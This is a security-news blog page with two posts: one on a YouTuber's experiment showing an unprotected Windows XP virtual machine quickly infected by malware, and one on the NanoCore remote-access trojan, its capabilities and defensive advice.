Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label OS. Show all posts

Legacy Windows OSes Fall Prey to Rapid Online Attacks

 


In 2014, Windows XP was officially retired, marking the end of a decade that has seen it occupy our desktops for more than a decade. The beloved OS was given one last security update in 2019, but for all intents and purposes, Jim, it is no longer around. Nevertheless, some are still using the software, including the US State Department, according to the General Accounting Office (GAO) of the federal government. 

In light of that, a curious YouTuber decided to check if a computer connected to the internet would get infected after a short period. There is an answer to this question in about 10 minutes. In a recent YouTube video, YouTuber Eric Parker demonstrated the danger of connecting classic Windows operating systems to the internet in 2024 without using any security measures (including firewalls and routers) to prevent viruses from spreading. 

As a result of setting up a virtual machine of Windows XP with a completely unsecured internet connection, the YouTuber was able to notice several viruses attacking the OS almost immediately. Getting your PC connected to the Internet without using any security might seem silly, but back in the early 2000s, catching a PC connected directly to the Internet without a router was very common. 

However, Windows XP indeed came with a built-in firewall and most people used anti-virus software as well. Even so, it was much easier to run a PC entirely unprotected (intentionally or accidentally) when compared to newer operating systems at that time. In addition to this, in 2024, running Windows XP unprotected is even more dangerous, since the operating system doesn't receive any security updates, which makes it pretty easy for hackers to hack into the system, making it very easy to penetrate the system. 

The virus that Eric Parker discovered on his Windows XP virtual machine two minutes after hooking it up to the internet, dubbed "conhoz.exe," suddenly installed itself on his computer randomly, and it appeared to be the same virus as the one on the desktop machine. Another virus followed soon after that by creating an entirely new account on Windows XP called "admin" which was hosting a file server hosted by an FTP server. 

Some strange things are going on in this experiment, so several hours after he had first started, he decided to return to it only to find that a new user named "Admina" had been added to the account, and this without him touching anything at all. He logged into the regular account and noticed a service named ftp.exe running, which did not sound very promising. Upon examining these files in Process Explorer, it became apparent that conhoz.exe was created by a program called "Microsoft Compilation." This has been a wild ride, with various nasty bits traced back to IP addresses in Russia (naturally), with more appearing and popping up as time goes on. 

Eric Parker runs the legacy version of Malwarebytes during the latter half of the video and, after running an initial scan, he finds eight different types of malware, which are discussed in the following sections. A change that was made during the installation was to the DNS (Domain Name System) that is used by the virtual private server from the Chinese company Alibaba for browsing and network access. It is not a good sign to see that sort of thing happening.

By the time the video ends, the malware has won, and an outdated anti-virus program, unable to deal with the various threats, is left to deal with the aftermath. Using the same open network setup as in Windows 7, Eric Parker notes that after several hours of using the same open network setup, there was no issue or evidence of malware running on that network. To identify the Russian fingerprints found on the suspect files, Mr Parker downloaded Malwarebytes and ran a scan against these files using the malware detection software. 

A quick scan of the system revealed that there were eight threats: four trojans, two backdoors, and two instances of adware. Having used a browser to look up some of the malware, PCGamer reported that in this case, the machine was most likely being used as a part of a botnet in a botnet in an attempt to obtain personal information from the users. Malwarebytes did not find conhoz.exe when he clicked on the quarantine button, but once the eight threats were quarantined and the system was rebooted, conhoz.exe did not begin automatically when the computer booted. 

The file remained in the Windows/Temp folder, indicating that the program's launcher might have been neutralized. However, this was not the case. After a few minutes, the program started running again. In response, Malwarebytes was run a second time to detect illicit services. Surprisingly, Malwarebytes suddenly shut down and disappeared. Upon checking the Task Manager, the process conhoz.exe was once again found running in the background. Mr Parker described this as a "victory for the malware." These incidents exemplify a worst-case scenario for both Windows XP and Windows 2000 operating systems. 

Without fundamental security measures, online hackers can exploit tools such as Nmap to identify the specific operating system version running on a vulnerable system. Once they ascertain that the system is vulnerable, they can freely download and execute viruses and malware directly on the system. Such severe security vulnerabilities do not exist in modern operating systems. Windows 10 and Windows 11, for instance, are equipped with significantly more robust security measures that prevent malware from installing itself, even if the firewall is disabled. 

Eric Parker confirmed that Microsoft operating systems dating back to Windows 7 are not affected by the previously demonstrated security vulnerabilities. He conducted a test by running Windows 7 for several hours without antivirus software or a firewall on another virtual machine and did not detect any viruses on the system. This demonstrates substantial improvements in security measures in modern operating systems compared to their legacy counterparts.

Windows Users Beware of the “Complete Control” Hack Attack; Update Imperative!





The hardware device drivers of Microsoft Windows due to a common design flaw left the entire systems of users compromised giving it to a recently resuscitated Remote Tojan Access (RAT).

The RAT brought about a hack attack tool with a modified format which as it turns out is absolutely free of cost.

The NanoCore RAT as it’s called, has been hovering around the dark web for quite some time now. It was sold initially for $25 which is a minimal amount for a hacking tool for Windows OS.

NanoCore’s cracked version, as soon as it appeared caused quite a commotion amongst researchers and hackers.

Initially the “premium plugins” were especially paid for privileges but the latest cracked version has it all for free.

The NanoCore coder had to be arrested given the rising familiarity of the product and the fact that he was a part cybercrime!
Despite that, NanoCore thrived and generated other tool variants RAT, Surprise Ransomware, LuminosityLink and of course the free “highly modified” latest version.

The NanoCore RAT, per researchers is controlled by way of easy security measures, no particular entry troubles and a really uncomplicated interface to aid even the novice hackers.

There was an outburst of campaigns using the very malware including:
·       Remote shutdown and restart of Windows systems
·       Remote file browsing on the infected system
·       Access and control of Task Manager, mouse and Registry editor
·       Disabling webcam lights to spy
·       Taking over open webpages
·       Recovering passwords and obtaining credentials
·       Remotely operated “locker” for encryption

Owing it to the long presence of NanoCore the techniques it uses are well known to the researchers. Scripting, registry keys and malicious attachments are the three main categories that the researchers found out.


The scripting threat’s basic solution is to check Microsoft office files for macro code and “anomalous execution” of legitimate scripting programs like PowerShell or Wscript.

The registry keys should be monitored for updates and patch cycles and rigorous security implementations should be made for behavioural detection.

Windows users should immediately go ahead and get their systems updated and make sure all their applications are running the way they actually should.

Additionally, Windows 10, 8.1 and 7 users should especially keep a keen check on regular updates and patching!